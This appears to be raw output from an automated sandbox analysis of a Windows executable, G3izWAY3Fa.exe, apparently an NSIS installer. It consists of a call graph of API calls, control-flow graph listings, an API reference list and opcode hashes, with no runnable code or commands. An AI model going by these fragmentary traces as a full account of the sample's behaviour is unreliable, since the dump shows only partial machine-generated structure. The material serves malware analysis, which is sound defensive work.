calls 3891->3892 3894 402510 3892->3894 3893 402586 3894->3893 3895 402544 ReadFile 3894->3895 3896 402588 3894->3896 3898 402598 3894->3898 3895->3893 3895->3894 3900 40593b wsprintfA 3896->3900 3898->3893 3899 4025ae SetFilePointer 3898->3899 3899->3893 3900->3893 3901 404186 3902 404196 3901->3902 3903 4041bc 3901->3903 3904 403d8f 19 API calls 3902->3904 3905 403df6 8 API calls 
3903->3905 3906 4041a3 SetDlgItemTextA 3904->3906 3907 4041c8 3905->3907 3906->3903 3061 401389 3063 401390 3061->3063 3062 4013fe 3063->3062 3064 4013cb MulDiv SendMessageA 3063->3064 3064->3063 3908 401c8a 3909 4029d9 18 API calls 3908->3909 3910 401c91 3909->3910 3911 4029d9 18 API calls 3910->3911 3912 401c99 GetDlgItem 3911->3912 3913 4024b8 3912->3913 3927 401490 3928 404d7b 25 API calls 3927->3928 3929 401497 3928->3929 3930 402615 3931 402618 3930->3931 3932 402630 3930->3932 3933 402625 FindNextFileA 3931->3933 3933->3932 3934 40266f 3933->3934 3936 4059dd lstrcpynA 3934->3936 3936->3932 3937 401595 3938 4029f6 18 API calls 3937->3938 3939 40159c SetFileAttributesA 3938->3939 3940 4015ae 3939->3940 3941 401d95 3942 4029d9 18 API calls 3941->3942 3943 401d9b 3942->3943 3944 4029d9 18 API calls 3943->3944 3945 401da4 3944->3945 3946 401db6 EnableWindow 3945->3946 3947 401dab ShowWindow 3945->3947 3948 40288b 3946->3948 3947->3948 3949 401e95 3950 4029f6 18 API calls 3949->3950 3951 401e9c 3950->3951 3952 405cd8 2 API calls 3951->3952 3953 401ea2 3952->3953 3955 401eb4 3953->3955 3956 40593b wsprintfA 3953->3956 3956->3955 3957 401696 3958 4029f6 18 API calls 3957->3958 3959 40169c GetFullPathNameA 3958->3959 3960 4016b3 3959->3960 3966 4016d4 3959->3966 3963 405cd8 2 API calls 3960->3963 3960->3966 3961 4016e8 GetShortPathNameA 3962 40288b 3961->3962 3964 4016c4 3963->3964 3964->3966 3967 4059dd lstrcpynA 3964->3967 3966->3961 3966->3962 3967->3966 3968 401d1b GetDC GetDeviceCaps 3969 4029d9 18 API calls 3968->3969 3970 401d37 MulDiv 3969->3970 3971 4029d9 18 API calls 3970->3971 3972 401d4c 3971->3972 3973 4059ff 18 API calls 3972->3973 3974 401d85 CreateFontIndirectA 3973->3974 3975 4024b8 3974->3975 3976 401e1b 3977 4029f6 18 API calls 3976->3977 3978 401e21 3977->3978 3979 404d7b 25 API calls 3978->3979 3980 401e2b 3979->3980 3981 40523d 2 API calls 3980->3981 3982 401e31 3981->3982 3983 401e87 CloseHandle 3982->3983 3984 40265c 3982->3984 3985 401e50 
WaitForSingleObject 3982->3985 3989 405d38 2 API calls 3982->3989 3983->3984 3985->3982 3986 401e5e GetExitCodeProcess 3985->3986 3987 401e70 3986->3987 3988 401e79 3986->3988 3991 40593b wsprintfA 3987->3991 3988->3983 3989->3985 3991->3988 3999 40249c 4000 4029f6 18 API calls 3999->4000 4001 4024a3 4000->4001 4004 4056b4 GetFileAttributesA CreateFileA 4001->4004 4003 4024af 4004->4003 4005 402020 4006 4029f6 18 API calls 4005->4006 4007 402027 4006->4007 4008 4029f6 18 API calls 4007->4008 4009 402031 4008->4009 4010 4029f6 18 API calls 4009->4010 4011 40203a 4010->4011 4012 4029f6 18 API calls 4011->4012 4013 402044 4012->4013 4014 4029f6 18 API calls 4013->4014 4015 40204e 4014->4015 4016 402062 CoCreateInstance 4015->4016 4017 4029f6 18 API calls 4015->4017 4020 402081 4016->4020 4021 402137 4016->4021 4017->4016 4018 401423 25 API calls 4019 402169 4018->4019 4020->4021 4022 402116 MultiByteToWideChar 4020->4022 4021->4018 4021->4019 4022->4021 4023 401721 4024 4029f6 18 API calls 4023->4024 4025 401728 4024->4025 4026 4056e3 2 API calls 4025->4026 4027 40172f 4026->4027 4027->4027 4028 401922 4029 4029f6 18 API calls 4028->4029 4030 401929 lstrlenA 4029->4030 4031 4024b8 4030->4031 4032 402223 4033 40222b 4032->4033 4036 402231 4032->4036 4034 4029f6 18 API calls 4033->4034 4034->4036 4035 402241 4038 40224f 4035->4038 4039 4029f6 18 API calls 4035->4039 4036->4035 4037 4029f6 18 API calls 4036->4037 4037->4035 4040 4029f6 18 API calls 4038->4040 4039->4038 4041 402258 WritePrivateProfileStringA 4040->4041 4042 403ea3 lstrcpynA lstrlenA 4043 401ca5 4044 4029d9 18 API calls 4043->4044 4045 401cb5 SetWindowLongA 4044->4045 4046 40288b 4045->4046 4047 401a26 4048 4029d9 18 API calls 4047->4048 4049 401a2c 4048->4049 4050 4029d9 18 API calls 4049->4050 4051 4019d6 4050->4051 4052 402427 4062 402b00 4052->4062 4054 402431 4055 4029d9 18 API calls 4054->4055 4056 40243a 4055->4056 4057 402451 RegEnumKeyA 4056->4057 4058 40245d RegEnumValueA 4056->4058 4060 40265c 
4056->4060 4059 402476 RegCloseKey 4057->4059 4058->4059 4058->4060 4059->4060 4063 4029f6 18 API calls 4062->4063 4064 402b19 4063->4064 4065 402b27 RegOpenKeyExA 4064->4065 4065->4054 4066 4022a7 4067 4022d7 4066->4067 4068 4022ac 4066->4068 4069 4029f6 18 API calls 4067->4069 4070 402b00 19 API calls 4068->4070 4072 4022de 4069->4072 4071 4022b3 4070->4071 4073 4029f6 18 API calls 4071->4073 4076 4022f4 4071->4076 4077 402a36 RegOpenKeyExA 4072->4077 4074 4022c4 RegDeleteValueA RegCloseKey 4073->4074 4074->4076 4084 402aad 4077->4084 4085 402a61 4077->4085 4078 402a87 RegEnumKeyA 4079 402a99 RegCloseKey 4078->4079 4078->4085 4081 405cff 3 API calls 4079->4081 4080 402abe RegCloseKey 4080->4084 4083 402aa9 4081->4083 4082 402a36 3 API calls 4082->4085 4083->4084 4086 402ad9 RegDeleteKeyA 4083->4086 4084->4076 4085->4078 4085->4079 4085->4080 4085->4082 4086->4084 4087 405fa8 4089 405e2c 4087->4089 4088 406797 4089->4088 4090 405eb6 GlobalAlloc 4089->4090 4091 405ead GlobalFree 4089->4091 4092 405f24 GlobalFree 4089->4092 4093 405f2d GlobalAlloc 4089->4093 4090->4088 4090->4089 4091->4090 4092->4093 4093->4088 4093->4089 4094 401bad 4095 4029d9 18 API calls 4094->4095 4096 401bb4 4095->4096 4097 4029d9 18 API calls 4096->4097 4098 401bbe 4097->4098 4099 401bce 4098->4099 4100 4029f6 18 API calls 4098->4100 4101 401bde 4099->4101 4102 4029f6 18 API calls 4099->4102 4100->4099 4103 401be9 4101->4103 4104 401c2d 4101->4104 4102->4101 4105 4029d9 18 API calls 4103->4105 4106 4029f6 18 API calls 4104->4106 4108 401bee 4105->4108 4107 401c32 4106->4107 4109 4029f6 18 API calls 4107->4109 4110 4029d9 18 API calls 4108->4110 4111 401c3b FindWindowExA 4109->4111 4112 401bf7 4110->4112 4115 401c59 4111->4115 4113 401c1d SendMessageA 4112->4113 4114 401bff SendMessageTimeoutA 4112->4114 4113->4115 4114->4115 4116 4023af 4117 402b00 19 API calls 4116->4117 4118 4023b9 4117->4118 4119 4029f6 18 API calls 4118->4119 4120 4023c2 4119->4120 4121 4023cc RegQueryValueExA 4120->4121 
4125 40265c 4120->4125 4122 4023f2 RegCloseKey 4121->4122 4123 4023ec 4121->4123 4122->4125 4123->4122 4127 40593b wsprintfA 4123->4127 4127->4122 2949 4015b3 2950 4029f6 18 API calls 2949->2950 2951 4015ba 2950->2951 2967 405564 CharNextA CharNextA 2951->2967 2953 40160a 2955 40162d 2953->2955 2956 40160f 2953->2956 2954 4054fb CharNextA 2957 4015d0 CreateDirectoryA 2954->2957 2960 401423 25 API calls 2955->2960 2958 401423 25 API calls 2956->2958 2959 4015e5 GetLastError 2957->2959 2964 4015c2 2957->2964 2961 401616 2958->2961 2963 4015f2 GetFileAttributesA 2959->2963 2959->2964 2966 402169 2960->2966 2973 4059dd lstrcpynA 2961->2973 2963->2964 2964->2953 2964->2954 2965 401621 SetCurrentDirectoryA 2965->2966 2968 40557e 2967->2968 2972 40558a 2967->2972 2969 405585 CharNextA 2968->2969 2968->2972 2970 4055a7 2969->2970 2970->2964 2971 4054fb CharNextA 2971->2972 2972->2970 2972->2971 2973->2965 2974 401734 2975 4029f6 18 API calls 2974->2975 2976 40173b 2975->2976 2977 401761 2976->2977 2978 401759 2976->2978 3040 4059dd lstrcpynA 2977->3040 3039 4059dd lstrcpynA 2978->3039 2981 40175f 2985 405c3f 5 API calls 2981->2985 2982 40176c 3041 4054d0 lstrlenA CharPrevA 2982->3041 2998 40177e 2985->2998 2986 401789 2990 401795 CompareFileTime 2986->2990 2986->2998 3044 405cd8 FindFirstFileA 2986->3044 2990->2986 2991 401859 2992 404d7b 25 API calls 2991->2992 2993 401863 2992->2993 3017 402e5b 2993->3017 2994 404d7b 25 API calls 2997 401845 2994->2997 2995 4059dd lstrcpynA 2995->2998 2998->2986 2998->2991 2998->2995 3001 4059ff 18 API calls 2998->3001 3011 401830 2998->3011 3013 405695 GetFileAttributesA 2998->3013 3016 4056b4 GetFileAttributesA CreateFileA 2998->3016 3047 40529e 2998->3047 3000 40188a SetFileTime 3002 40189c CloseHandle 3000->3002 3001->2998 3002->2997 3003 4018ad 3002->3003 3004 4018b2 3003->3004 3005 4018c5 3003->3005 3006 4059ff 18 API calls 3004->3006 3007 4059ff 18 API calls 3005->3007 3009 4018ba lstrcatA 3006->3009 3010 4018cd 3007->3010 
3009->3010 3012 40529e MessageBoxIndirectA 3010->3012 3011->2994 3011->2997 3012->2997 3014 4056b1 3013->3014 3015 4056a4 SetFileAttributesA 3013->3015 3014->2998 3015->3014 3016->2998 3019 402e71 3017->3019 3018 402e9c 3051 40304e ReadFile 3018->3051 3019->3018 3060 403080 SetFilePointer 3019->3060 3023 402fe2 3025 402fe6 3023->3025 3030 402ffe 3023->3030 3024 402eb9 GetTickCount 3035 402ecc 3024->3035 3027 40304e ReadFile 3025->3027 3026 401876 3026->3000 3026->3002 3027->3026 3028 40304e ReadFile 3028->3030 3029 40304e ReadFile 3029->3035 3030->3026 3030->3028 3031 403019 WriteFile 3030->3031 3031->3026 3032 40302e 3031->3032 3032->3026 3032->3030 3034 402f32 GetTickCount 3034->3035 3035->3026 3035->3029 3035->3034 3036 402f5b MulDiv wsprintfA 3035->3036 3037 402f99 WriteFile 3035->3037 3053 405df9 3035->3053 3038 404d7b 25 API calls 3036->3038 3037->3026 3037->3035 3038->3035 3039->2981 3040->2982 3042 401772 lstrcatA 3041->3042 3043 4054ea lstrcatA 3041->3043 3042->2981 3043->3042 3045 405cf9 3044->3045 3046 405cee FindClose 3044->3046 3045->2986 3046->3045 3048 4052b3 3047->3048 3049 4052ff 3048->3049 3050 4052c7 MessageBoxIndirectA 3048->3050 3049->2998 3050->3049 3052 402ea7 3051->3052 3052->3023 3052->3024 3052->3026 3056 405e1e 3053->3056 3059 405e26 3053->3059 3054 405eb6 GlobalAlloc 3054->3056 3054->3059 3055 405ead GlobalFree 3055->3054 3056->3035 3057 405f24 GlobalFree 3058 405f2d GlobalAlloc 3057->3058 3058->3056 3058->3059 3059->3054 3059->3055 3059->3056 3059->3057 3059->3058 3060->3018 4135 401634 4136 4029f6 18 API calls 4135->4136 4137 40163a 4136->4137 4138 405cd8 2 API calls 4137->4138 4139 401640 4138->4139 4140 401934 4141 4029d9 18 API calls 4140->4141 4142 40193b 4141->4142 4143 4029d9 18 API calls 4142->4143 4144 401945 4143->4144 4145 4029f6 18 API calls 4144->4145 4146 40194e 4145->4146 4147 401961 lstrlenA 4146->4147 4148 40199c 4146->4148 4149 40196b 4147->4149 4149->4148 4153 4059dd lstrcpynA 4149->4153 4151 401985 4151->4148 4152 
401992 lstrlenA 4151->4152 4152->4148 4153->4151 4154 4019b5 4155 4029f6 18 API calls 4154->4155 4156 4019bc 4155->4156 4157 4029f6 18 API calls 4156->4157 4158 4019c5 4157->4158 4159 4019cc lstrcmpiA 4158->4159 4160 4019de lstrcmpA 4158->4160 4161 4019d2 4159->4161 4160->4161 4162 4014b7 4163 4014bd 4162->4163 4164 401389 2 API calls 4163->4164 4165 4014c5 4164->4165 4166 404eb9 4167 405065 4166->4167 4168 404eda GetDlgItem GetDlgItem GetDlgItem 4166->4168 4170 405096 4167->4170 4171 40506e GetDlgItem CreateThread CloseHandle 4167->4171 4212 403dc4 SendMessageA 4168->4212 4173 4050c1 4170->4173 4174 4050e3 4170->4174 4175 4050ad ShowWindow ShowWindow 4170->4175 4171->4170 4172 404f4b 4177 404f52 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4172->4177 4176 40511f 4173->4176 4179 4050d2 4173->4179 4180 4050f8 ShowWindow 4173->4180 4181 403df6 8 API calls 4174->4181 4214 403dc4 SendMessageA 4175->4214 4176->4174 4186 40512a SendMessageA 4176->4186 4184 404fc1 4177->4184 4185 404fa5 SendMessageA SendMessageA 4177->4185 4215 403d68 4179->4215 4182 405118 4180->4182 4183 40510a 4180->4183 4193 4050f1 4181->4193 4189 403d68 SendMessageA 4182->4189 4188 404d7b 25 API calls 4183->4188 4190 404fd4 4184->4190 4191 404fc6 SendMessageA 4184->4191 4185->4184 4192 405143 CreatePopupMenu 4186->4192 4186->4193 4188->4182 4189->4176 4195 403d8f 19 API calls 4190->4195 4191->4190 4194 4059ff 18 API calls 4192->4194 4196 405153 AppendMenuA 4194->4196 4197 404fe4 4195->4197 4198 405166 GetWindowRect 4196->4198 4199 405179 4196->4199 4200 405021 GetDlgItem SendMessageA 4197->4200 4201 404fed ShowWindow 4197->4201 4203 405182 TrackPopupMenu 4198->4203 4199->4203 4200->4193 4202 405048 SendMessageA SendMessageA 4200->4202 4204 405010 4201->4204 4205 405003 ShowWindow 4201->4205 4202->4193 4203->4193 4206 4051a0 4203->4206 4213 403dc4 SendMessageA 4204->4213 4205->4204 4207 4051bc SendMessageA 4206->4207 4207->4207 4209 4051d9 OpenClipboard EmptyClipboard GlobalAlloc 
GlobalLock 4207->4209 4210 4051fb SendMessageA 4209->4210 4210->4210 4211 40521c GlobalUnlock SetClipboardData CloseClipboard 4210->4211 4211->4193 4212->4172 4213->4200 4214->4173 4216 403d75 SendMessageA 4215->4216 4217 403d6f 4215->4217 4216->4174 4217->4216 4218 402b3b 4219 402b63 4218->4219 4220 402b4a SetTimer 4218->4220 4221 402bb8 4219->4221 4222 402b7d MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4219->4222 4220->4219 4222->4221 4223 4038bc 4224 4038d4 4223->4224 4225 403a0f 4223->4225 4224->4225 4226 4038e0 4224->4226 4227 403a20 GetDlgItem GetDlgItem 4225->4227 4228 403a60 4225->4228 4229 4038eb SetWindowPos 4226->4229 4230 4038fe 4226->4230 4231 403d8f 19 API calls 4227->4231 4232 403aba 4228->4232 4237 401389 2 API calls 4228->4237 4229->4230 4234 403903 ShowWindow 4230->4234 4235 40391b 4230->4235 4236 403a4a SetClassLongA 4231->4236 4233 403ddb SendMessageA 4232->4233 4253 403a0a 4232->4253 4260 403acc 4233->4260 4234->4235 4238 403923 DestroyWindow 4235->4238 4239 40393d 4235->4239 4240 40140b 2 API calls 4236->4240 4241 403a92 4237->4241 4290 403d18 4238->4290 4242 403942 SetWindowLongA 4239->4242 4243 403953 4239->4243 4240->4228 4241->4232 4246 403a96 SendMessageA 4241->4246 4242->4253 4244 4039ca 4243->4244 4245 40395f GetDlgItem 4243->4245 4251 403df6 8 API calls 4244->4251 4249 403972 SendMessageA IsWindowEnabled 4245->4249 4250 40398f 4245->4250 4246->4253 4247 40140b 2 API calls 4247->4260 4248 403d1a DestroyWindow EndDialog 4248->4290 4249->4250 4249->4253 4255 40399c 4250->4255 4256 4039e3 SendMessageA 4250->4256 4257 4039af 4250->4257 4266 403994 4250->4266 4251->4253 4252 403d49 ShowWindow 4252->4253 4254 4059ff 18 API calls 4254->4260 4255->4256 4255->4266 4256->4244 4261 4039b7 4257->4261 4262 4039cc 4257->4262 4258 403d68 SendMessageA 4258->4244 4259 403d8f 19 API calls 4259->4260 4260->4247 4260->4248 4260->4253 4260->4254 4260->4259 4265 403d8f 19 API calls 4260->4265 4281 403c5a DestroyWindow 4260->4281 4264 40140b 2 API calls 
4261->4264 4263 40140b 2 API calls 4262->4263 4263->4266 4264->4266 4267 403b47 GetDlgItem 4265->4267 4266->4244 4266->4258 4268 403b64 ShowWindow EnableWindow 4267->4268 4269 403b5c 4267->4269 4291 403db1 EnableWindow 4268->4291 4269->4268 4271 403b8e EnableWindow 4274 403ba2 4271->4274 4272 403ba7 GetSystemMenu EnableMenuItem SendMessageA 4273 403bd7 SendMessageA 4272->4273 4272->4274 4273->4274 4274->4272 4292 403dc4 SendMessageA 4274->4292 4293 4059dd lstrcpynA 4274->4293 4277 403c05 lstrlenA 4278 4059ff 18 API calls 4277->4278 4279 403c16 SetWindowTextA 4278->4279 4280 401389 2 API calls 4279->4280 4280->4260 4282 403c74 CreateDialogParamA 4281->4282 4281->4290 4283 403ca7 4282->4283 4282->4290 4284 403d8f 19 API calls 4283->4284 4285 403cb2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4284->4285 4286 401389 2 API calls 4285->4286 4287 403cf8 4286->4287 4287->4253 4288 403d00 ShowWindow 4287->4288 4289 403ddb SendMessageA 4288->4289 4289->4290 4290->4252 4290->4253 4291->4271 4292->4274 4293->4277 4294 40263e 4295 4029f6 18 API calls 4294->4295 4296 402645 FindFirstFileA 4295->4296 4297 402668 4296->4297 4301 402658 4296->4301 4298 40266f 4297->4298 4302 40593b wsprintfA 4297->4302 4303 4059dd lstrcpynA 4298->4303 4302->4298 4303->4301 4304 4024be 4305 4024c3 4304->4305 4306 4024d4 4304->4306 4307 4029d9 18 API calls 4305->4307 4308 4029f6 18 API calls 4306->4308 4310 4024ca 4307->4310 4309 4024db lstrlenA 4308->4309 4309->4310 4311 4024fa WriteFile 4310->4311 4312 40265c 4310->4312 4311->4312

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 4030cb-403160 #17 SetErrorMode OleInitialize call 405cff SHGetFileInfoA call 4059dd GetCommandLineA call 4059dd GetModuleHandleA 7 403162-403167 0->7 8 40316c-403181 call 4054fb CharNextA 0->8 7->8 11 4031e6-4031ea 8->11 12 403183-403186 11->12 13 4031ec 11->13 14 403188-40318c 12->14 15 40318e-403196 12->15 16 4031ff-403217 GetTempPathA call 403097 13->16 14->14 14->15 17 403198-403199 15->17 18 40319e-4031a1 15->18 26 403239-403250 DeleteFileA call 402c22 16->26 27 403219-403237 GetWindowsDirectoryA lstrcatA call 403097 16->27 17->18 20 4031a3-4031a7 18->20 21 4031d6-4031e3 call 4054fb 18->21 24 4031b7-4031bd 20->24 25 4031a9-4031b2 20->25 21->11 38 4031e5 21->38 28 4031cd-4031d4 24->28 29 4031bf-4031c8 24->29 25->24 32 4031b4 25->32 39 4032b7-4032c6 ExitProcess CoUninitialize 26->39 40 403252-403258 26->40 27->26 27->39 28->21 36 4031ee-4031fa call 4059dd 28->36 29->28 35 4031ca 29->35 32->24 35->28 36->16 38->11 44 4033b1-4033b7 39->44 45 4032cc-4032dc call 40529e ExitProcess 39->45 42 4032a7-4032ae call 403526 40->42 43 40325a-403263 call 4054fb 40->43 52 4032b3 42->52 58 40326e-403270 43->58 46 403434-40343c 44->46 47 4033b9-4033d6 call 405cff * 3 44->47 53 403442-403446 ExitProcess 46->53 54 40343e 46->54 74 403420-40342b ExitWindowsEx 47->74 75 4033d8-4033da 47->75 52->39 54->53 60 403272-40327c 58->60 61 403265-40326b 58->61 64 4032e2-4032fc lstrcatA lstrcmpiA 60->64 65 40327e-40328b call 4055b1 60->65 61->60 63 40326d 61->63 63->58 64->39 67 4032fe-403313 CreateDirectoryA SetCurrentDirectoryA 64->67 65->39 77 40328d-4032a3 call 4059dd * 2 65->77 70 403320-40333a call 4059dd 67->70 71 403315-40331b call 4059dd 67->71 83 40333f-40335b call 4059ff DeleteFileA 70->83 71->70 74->46 80 40342d-40342f call 40140b 74->80 75->74 81 4033dc-4033de 75->81 77->42 80->46 81->74 85 4033e0-4033f2 GetCurrentProcess 81->85 91 40339c-4033a3 83->91 92 40335d-40336d CopyFileA 83->92 85->74 93 4033f4-403416 85->93 91->83 95 
4033a5-4033ac call 40572b 91->95 92->91 94 40336f-40338f call 40572b call 4059ff call 40523d 92->94 93->74 94->91 105 403391-403398 CloseHandle 94->105 95->39 105->91
                                APIs
                                • #17.COMCTL32 ref: 004030EA
                                • SetErrorMode.KERNELBASE(00008001), ref: 004030F5
                                • OleInitialize.OLE32(00000000), ref: 004030FC
                                  • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                  • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                  • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                • SHGetFileInfoA.SHELL32(0041F430,00000000,?,00000160,00000000,00000008), ref: 00403124
                                  • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,00423680,NSIS Error), ref: 004059EA
                                • GetCommandLineA.KERNEL32(00423680,NSIS Error), ref: 00403139
                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040314C
                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000020), ref: 00403177
                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040320A
                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040321F
                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040322B
                                • DeleteFileA.KERNELBASE(1033), ref: 0040323E
                                • ExitProcess.KERNEL32(00000000), ref: 004032B7
                                • CoUninitialize.COMBASE(00000000), ref: 004032BC
                                • ExitProcess.KERNEL32 ref: 004032DC
                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,00000000), ref: 004032E8
                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004032F4
                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403300
                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403307
                                • DeleteFileA.KERNEL32(0041F030,0041F030,?,00424000,?), ref: 00403351
                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\G3izWAY3Fa.exe,0041F030,00000001), ref: 00403365
                                • CloseHandle.KERNEL32(00000000,0041F030,0041F030,?,0041F030,00000000), ref: 00403392
                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033E7
                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403423
                                • ExitProcess.KERNEL32 ref: 00403446
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\G3izWAY3Fa.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\G3izWAY3Fa.exe$C:\Windows\temp$C:\Windows\temp$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                • API String ID: 553446912-3967748765
                                • Opcode ID: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
                                • Instruction ID: cc286ec977d2638fbe9c092aa5ad16f4889e12429ffafd7da1ab197300c5bae6
                                • Opcode Fuzzy Hash: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
                                • Instruction Fuzzy Hash: 9691B170A08340AED7216F619D49B6B7EACEB0530AF44047FF581B62D2C77C9E458B6E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 405 405fa8-405fad 406 40601e-40603c 405->406 407 405faf-405fde 405->407 408 406614-406629 406->408 409 405fe0-405fe3 407->409 410 405fe5-405fe9 407->410 412 406643-406659 408->412 413 40662b-406641 408->413 411 405ff5-405ff8 409->411 414 405ff1 410->414 415 405feb-405fef 410->415 417 406016-406019 411->417 418 405ffa-406003 411->418 416 40665c-406663 412->416 413->416 414->411 415->411 419 406665-406669 416->419 420 40668a-406696 416->420 423 4061eb-406209 417->423 421 406005 418->421 422 406008-406014 418->422 426 406818-406822 419->426 427 40666f-406687 419->427 432 405e2c-405e35 420->432 421->422 429 40607e-4060ac 422->429 424 406221-406233 423->424 425 40620b-40621f 423->425 431 406236-406240 424->431 425->431 430 40682e-406841 426->430 427->420 433 4060c8-4060e2 429->433 434 4060ae-4060c6 429->434 440 406846-40684a 430->440 436 406242 431->436 437 4061e3-4061e9 431->437 438 406843 432->438 439 405e3b 432->439 435 4060e5-4060ef 433->435 434->435 442 4060f5 435->442 443 406066-40606c 435->443 444 406353-406360 436->444 445 4061be-4061c2 436->445 437->423 441 406187-406191 437->441 438->440 446 405e42-405e46 439->446 447 405f82-405fa3 439->447 448 405ee7-405eeb 439->448 449 405f57-405f5b 439->449 456 4067d6-4067e0 441->456 457 406197-4061b9 441->457 468 4067b2-4067bc 442->468 469 40604b-406063 442->469 458 406072-406078 443->458 459 40611f-406125 443->459 444->432 460 4063af-4063be 444->460 461 4061c8-4061e0 445->461 462 4067ca-4067d4 445->462 446->430 453 405e4c-405e59 446->453 447->408 451 405ef1-405f0a 448->451 452 406797-4067a1 448->452 454 405f61-405f75 449->454 455 4067a6-4067b0 449->455 463 405f0d-405f11 451->463 452->430 453->438 467 405e5f-405ea5 453->467 466 405f78-405f80 454->466 455->430 456->430 457->444 458->429 464 406183 458->464 459->464 465 406127-406145 459->465 460->408 461->437 462->430 463->448 470 405f13-405f19 463->470 464->441 471 406147-40615b 465->471 472 40615d-40616f 465->472 466->447 
466->449 473 405ea7-405eab 467->473 474 405ecd-405ecf 467->474 468->430 469->443 475 405f43-405f55 470->475 476 405f1b-405f22 470->476 477 406172-40617c 471->477 472->477 478 405eb6-405ec4 GlobalAlloc 473->478 479 405ead-405eb0 GlobalFree 473->479 480 405ed1-405edb 474->480 481 405edd-405ee5 474->481 475->466 482 405f24-405f27 GlobalFree 476->482 483 405f2d-405f3d GlobalAlloc 476->483 477->459 484 40617e 477->484 478->438 485 405eca 478->485 479->478 480->480 480->481 481->463 482->483 483->438 483->475 487 406104-40611c 484->487 488 4067be-4067c8 484->488 485->474 487->459 488->430
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
                                • Instruction ID: ffbedf2a53f09e030cb941e21afd419a8c3069ec791793070072d3341ca218b9
                                • Opcode Fuzzy Hash: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
